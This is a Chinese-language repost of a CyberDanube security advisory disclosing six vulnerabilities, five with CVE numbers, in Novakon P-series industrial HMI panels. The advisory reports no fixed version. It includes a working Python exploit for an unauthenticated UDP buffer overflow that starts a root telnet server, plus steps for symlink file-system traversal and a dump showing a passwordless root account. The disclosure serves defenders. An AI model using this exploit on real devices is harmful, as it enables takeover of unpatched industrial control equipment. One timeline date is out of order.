Novakon HMI系列多重安全漏洞深度剖析

本文详细披露了Novakon触摸屏HMI P系列存在的六个高危漏洞,包括未授权缓冲区溢出、目录遍历和弱认证机制等,攻击者可利用这些漏洞获得设备root权限并执行任意代码。

CyberDanube安全研究20250919-0 | Novakon P系列多重漏洞分析

漏洞概要

| 标题 | Novakon HMI系列多重漏洞 | | 产品 | Novakon触摸屏HMI P系列 | | 受影响版本 | P - V2001.A.c518o2 | | 修复版本 | - | | CVE编号 | CVE-2025-9962, CVE-2025-9963, CVE-2025-9964, CVE-2025-9965, CVE-2025-9966 | | 影响等级 | 严重 | | 厂商主页 | https://www.novakon.com.tw/ | | 发现时间 | 2025年5月21日 | | 发现者 | S. Dietz(维也纳办公室) | | | CyberDanube安全研究 | | | 维也纳 | 圣珀尔滕 |

厂商描述

Novakon有限公司成立于2010年,是上市工业计算机制造商iBASE Technology(TPEx: 8050)的子公司,专注于工业平板电脑、人机界面和工业物联网软件的开发及硬件制造。公司提供广泛的定制化软件解决方案,不仅提供软硬件ODM服务,还致力于为不同工业应用提供最佳产品功能和服务。

受影响版本

P - V2001.A.c518o2

漏洞概述

1) 未授权缓冲区溢出(CVE-2025-9962)

PSeriesbiosinterface二进制文件中存在缓冲区溢出漏洞,未经身份验证的攻击者可通过网络以root权限远程执行代码。

2) 通过符号链接的目录遍历(CVE-2025-9963)

设备的文件浏览器功能存在目录遍历漏洞,攻击者可利用此漏洞以"root"用户身份读取和写入系统范围内的文件和配置。

3) Root用户弱认证(CVE-2025-9964)

root用户未配置密码,攻击者可通过控制台使用空字符串登录。

4) UDP服务弱认证(CVE-2025-9965)

监听60681/UDP端口的服务负责向设备复制应用程序。由于该服务不需要身份验证,攻击者可以不受限制地上传和下载应用程序。

5) 不必要的特权执行(CVE-2025-9966)

设备上运行的进程大多以提升的权限运行,增加了设备的攻击面。

6) 缺少保护机制

设备上的多个二进制文件缺少基本的保护机制,如栈保护、位置无关可执行文件和重定位只读。

概念验证

1) 未授权缓冲区溢出(CVE-2025-9962)

运行在60681/UDP端口的服务(PSeriesbiosinterface)存在基于栈的缓冲区溢出漏洞。未经身份验证的攻击者可利用此问题以root权限获得远程代码执行能力。以下Python PoC可用于在设备上启动telnet服务器:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

#!/bin/env python3
# fitfrost4 <S.Dietz>
from pwn import *

p = remote(args.IP, 60681, typ='udp')

r6_pos = 112
pc_pos = 136
sp_pos = 576
system_call = 0x0002e728

# 0x000ef2ce (0x000ef2cf): add r0, sp, #0x1b4; bx r6;
buf = flat({
    r6_pos: p32(system_call),
    pc_pos: p32(0x000ef2cf),
    sp_pos: b"/usr/sbin/telnetd &\00"
    })

log.info(hexdump(buf))
p.send(buf)

此问题的根本原因是在client::readDatagram()中使用了来自QUdpSocket::pendingDatagramSize()的未检查大小。

2) 通过符号链接的目录遍历(CVE-2025-9963)

物理攻击者可以在闪存驱动器上创建ext2分区并添加指向/的符号链接,以滥用GUI的文件浏览器功能修改系统范围内的配置文件。

步骤:

  1. 使用iFace Designer创建并上传包含文件浏览器按钮的应用程序
  2. 格式化并创建指向"/“的符号链接
  3. 使用复制/粘贴功能以root身份修改文件系统

3) Root用户弱认证(CVE-2025-9964)

具有控制台访问权限的攻击者可以使用空密码以root身份登录。

1
2
3
4
5
6

am335x-evm login: root
root@am335x-evm:~# cat /etc/shadow
root::16622:0:99999:7:::
daemon:*:16622:0:99999:7:::
bin:*:16622:0:99999:7:::
[...]

4) UDP服务弱认证(CVE-2025-9965)

攻击者可以在没有任何身份验证的情况下向设备上传和下载应用程序。

步骤:

  1. 安装iFACE Designer
  2. 通过网络上传或下载任何应用程序

5) 不必要的特权执行(CVE-2025-9966)

设备上运行的进程大多以root用户身份执行,增加了设备的攻击面。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

root@am335x-evm:~# ps
  PID USER       VSZ STAT COMMAND
[...]
  938 root      2636 S    /lib/udev/udevd -d
 1215 root      2632 S    /lib/udev/udevd -d
 1216 root      2632 S    /lib/udev/udevd -d
 1418 messageb  2352 S    /usr/bin/dbus-daemon --system
 1436 root     74984 S    ./superkon/tools/PSeriesbiosinterface -qws
 1441 root      1868 S    /sbin/syslogd -n -O /var/log/messages
 1444 root      1868 S    /sbin/klogd -n
 1456 root      1872 S    /sbin/getty 38400 tty1
 1612 root      2624 S    /bin/login
 1636 root      165m S    {RT} iFACE_RT -qws -display LinuxFb:

6) 缺少保护机制

被利用的二进制文件缺少基本的保护机制。

1
2
3
4
5
6
7
8

$ checksec --file=PSeriesbiosinterface
    Arch:       arm-32-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8000)
    RPATH:      b'/opt/qt_arm48_p/lib'
    Stripped:   No

解决方案

临时措施

限制对设备的网络访问。如果使用串口进行PLC通信,请禁用以太网配置。

建议

限制对设备的网络访问。如果使用串口进行PLC通信,请禁用以太网配置。

联系时间线

2025-06-21:联系Novakon寻求安全联系人 2025-05-21:向sales () novakon com tw询问安全联系人 2025-05-26:再次向sales () novakon com tw和sales () novatekcontrols com询问安全联系人 2025-05-28:通过LinkedIn联系Novakon有限公司寻求安全联系人 2025-06-10:联系Bressner获取novakon联系方式 2025-06-10:再次向sales () novakon com tw发送邮件 2025-06-10:通过LinkedIn联系Novakon销售总监Vincent Shao 2025-06-11:向Vincent Shao询问安全联系人更新情况 2025-06-12:向Vincent Shao发送密码保护链接 2025-06-18:通过LinkedIn询问更新,无响应 2025-08-05:通过LinkedIn询问更新,无响应 2025-08-25:通过LinkedIn询问更新,告知9月19日发布公告 2025-09-19:发布安全公告

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次